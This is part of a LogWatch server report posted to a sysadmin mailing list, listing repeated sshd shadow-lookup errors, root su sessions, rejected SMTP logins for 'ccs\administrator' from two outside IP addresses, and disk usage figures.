error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
---------------------- SSHD End -------------------------
--------------------- Sudo (secure-log) Begin ------------------------
==============================================================================
dmah => root
------------------------------------------------------------------------------
/bin/su -
/bin/su -
/bin/su -
/bin/su -
---------------------- Sudo (secure-log) End -------------------------
--------------------- Syslogd Begin ------------------------
Syslogd started 1 Time(s)
---------------------- Syslogd End -------------------------
--------------------- vpopmail Begin ------------------------
**Unmatched Entries**
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.95.118
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.113.135
vchkpw-smtp: invalid user/domain characters ccs\administrator:222.252.113.135
---------------------- vpopmail End -------------------------
------------------ Disk Space --------------------
/dev/hda3 72G 27G 42G 40% /
/dev/hda1 92M 6.3M 81M 8% /boot
###################### LogWatch End #########################
More information about the Sysadmin
mailing list